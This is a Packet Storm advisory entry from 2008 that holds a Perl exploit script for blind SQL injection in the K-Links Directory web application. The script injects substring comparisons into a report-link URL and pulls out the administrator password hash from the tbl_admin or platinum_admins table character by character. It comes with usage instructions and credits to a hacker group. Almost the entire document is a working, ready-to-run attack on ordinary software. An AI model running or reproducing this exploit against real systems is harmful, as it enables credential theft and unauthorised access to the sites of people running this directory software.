klinks-sql.txt

2008-08-13T00:00:00
ID PACKETSTORM:69004
Type packetstorm
Reporter hadihadi
Modified 2008-08-13T00:00:00

Description

                                        
                                            `#!/usr/bin/perl   
###########################################################################  
# K-Links Directory Blind SQL Injection Exploit #  
# ..::virangar security team::.. #  
# www.virangar.net #  
# C0d3d BY:virangar security team ( hadihadi ) #  
#special tnx to: #  
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #  
#& all virangar members & all hackerz #  
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #  
# ..:::Young Iranina Hackerz::.. #  
###########################################################################  
  
  
use HTTP::Request;  
use LWP::UserAgent;  
  
if (@ARGV != 2){  
header();  
}  
  
$host = $ARGV[0];  
$mod=$ARGV[1];  
if($mod==1){  
$tbl="tbl_admin";  
$col="upass";  
}  
elsif($mod==2){  
$tbl="platinum_admins";  
$col="a_apss";  
}  
else{  
print "\nyour option not true\n";  
exit;  
}  
  
print "\n md5 Password:\r\n";  
&halghe();  
print "\n[+]Done\n";  
  
  
sub halghe {  
for($i = 1; $i <= 32; $i++){  
$f = 0;  
$n = 48;  
while(!$f && $n <= 57)  
{  
if(&inject($host ,$tbl ,$col ,$i, $n,)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}  
if(!$f){   
$n=97;  
while(!$f && $n <= 102)  
{  
if(&inject($host ,$tbl ,$col ,$i, $n,)){  
$f = 1;  
syswrite(STDOUT, chr($n), 1);  
}  
$n++;  
}}  
}  
}  
sub inject {  
my $site = $_[0];  
my $tl = $_[1];  
my $cl = $_[2];  
my $a = $_[3];  
my $b = $_[4];  
  
  
$attack= "$site"."%20and%20substring((select%20"."$cl"."%20from%20$tl%20limit%200,1),"."$a".",1)=char("."$b".")/*";  
  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
$req = $b->request(HTTP::Request->new(GET=>$attack));  
$res = $req->content;  
  
if ($res !~ m/You have an error in your SQL syntax;/i and $res !~ m/Table.*doesn't exist/i ){  
return 1;  
}  
  
}  
sub header {  
print qq{  
###################################################################  
# K-Links Directory Blind SQL Injection Exploit #  
# www.virangar.net #  
# Useage: perl $0 Host option #  
# option: 1 [table=tbl_admin & column=upass] #  
# 2 [table=platinum_admins & column=a_pass] #  
# #  
# Host: full patch to Report Link+id (dont forget http://) #  
# #  
# Example: #  
# perl $0 http://site.com/report/1 2 #  
# #  
###################################################################  
};  
}  
`